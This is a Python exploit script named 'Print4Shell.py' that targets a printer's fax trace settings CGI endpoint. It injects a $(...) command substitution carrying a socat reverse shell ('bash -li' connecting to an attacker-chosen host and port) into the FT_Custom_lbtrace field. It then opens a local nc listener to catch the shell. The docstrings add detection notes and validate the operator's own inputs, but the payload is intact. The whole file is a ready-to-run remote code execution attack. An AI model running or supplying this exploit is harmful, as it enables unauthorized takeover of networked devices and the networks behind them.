Print4Shell.py
#!/usr/bin/python3
import argparse
import os
import requests
import threading
import time
import urllib.parse
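def start_listener(lport):
    """Run a blocking ``nc -l`` listener on the given local TCP port.

    The listener is unauthenticated: whatever connects first gets the
    session. The status line reports it as bound to 0.0.0.0 (all interfaces).

    Args:
        lport: Port to listen on, as an int or a numeric string (argparse
            hands over a string when ``--lport`` is given on the command line).

    Raises:
        ValueError: If ``lport`` is not an integer in the range 1-65535.
    """
    import subprocess  # local import: the file-level import block lacks it

    # Validate before anything is executed so a malformed value never reaches
    # a child process.
    try:
        port = int(lport)
    except (TypeError, ValueError):
        raise ValueError(f'invalid listener port: {lport!r}') from None
    if not 1 <= port <= 65535:
        raise ValueError(f'invalid listener port: {lport!r}')

    print(f'[*] Starting listener on 0.0.0.0:{port}...')
    # Argument list, no shell: the port value is never parsed by /bin/sh, so
    # metacharacters in a command-line argument cannot run extra commands on
    # the operator's machine.
    try:
        subprocess.run(['nc', '-l', str(port)], check=False)
    except FileNotFoundError:
        print('[!] nc not found on PATH')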
def send_payload(url, data):
    """POST ``data`` to ``url`` after a fixed two-second pause.

    ``exploit`` runs this on a background thread and then starts the
    listener on the main thread; the pause is presumably there so the
    listener is up before the request goes out.

    Args:
        url: Full URL the request is sent to.
        data: Request body, passed to ``requests.post`` unchanged.
    """
    startup_delay = 2
    time.sleep(startup_delay)
    print('[*] Sending payload to server...')
    # verify=False only affects TLS certificate checks; exploit() builds an
    # http:// URL, so it matters only if the server redirects to https.
    # NOTE(review): no timeout is passed, so this call blocks until the
    # server answers or the connection drops.
    requests.post(url, data=data, verify=False)
    print('[*] Sent payload')
def exploit(target, callback_host, callback_port):
    """Send the injection request to ``target`` and wait for the callback.

    Sequence, as visible in this function:
      1. Two plain GET requests to ``http://<target>/`` ("wakeup").
      2. A POST to ``/cgi-bin/fax_change_faxtrace_settings`` whose body sets
         ``FT_Custom_lbtrace`` to a ``$(...)`` command substitution wrapping a
         ``socat`` command, sent from a daemon thread via ``send_payload``.
      3. A blocking local listener on ``callback_port``.

    Detection notes (derived from the request built here): a POST to that CGI
    path with ``$(`` inside ``FT_Custom_lbtrace`` is the on-the-wire
    indicator; if the device executes the substituted command, it would open
    an outbound TCP connection to ``callback_host:callback_port``.

    Args:
        target: Host (optionally host:port) placed directly into the URLs.
        callback_host: Address embedded in the ``socat`` command.
        callback_port: Port embedded in the ``socat`` command and used for
            the local listener.
    """
    base_url = f'http://{target}'

    # Two identical GETs precede the POST; the script labels them "wakeup".
    for attempt in (1, 2):
        print(f'[*] Sending wakeup {attempt}...')
        requests.get(f'{base_url}/', verify=False)

    # callback_host/callback_port are interpolated without any validation.
    callback_cmd = f"socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{callback_host}:{callback_port}"
    endpoint = f'{base_url}/cgi-bin/fax_change_faxtrace_settings'
    body = f'FT_Custom_lbtrace=$({callback_cmd})'

    # The sender runs as a daemon thread so the main thread is free to block
    # in the listener; send_payload sleeps before posting.
    sender = threading.Thread(
        target=send_payload,
        args=(endpoint, body),
        daemon=True,
    )
    sender.start()

    start_listener(callback_port)
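if __name__ == "__main__":
    # Command-line entry point: read the target and listener settings, then
    # hand them to exploit().
    parser = argparse.ArgumentParser()
    parser.add_argument('-r', '--rhost', help='The IP address of the target', required=True)
    parser.add_argument('-l', '--lhost', help='The IP address of the listening post', required=True)
    # type=int rejects a non-numeric port at parse time and gives a
    # user-supplied value the same type as the default (443); without it the
    # raw string from the command line flows into the listener command.
    parser.add_argument('-p', '--lport', help='The port of the listening post', type=int, default=443)
    args = parser.parse_args()
    exploit(args.rhost, args.lhost, args.lport)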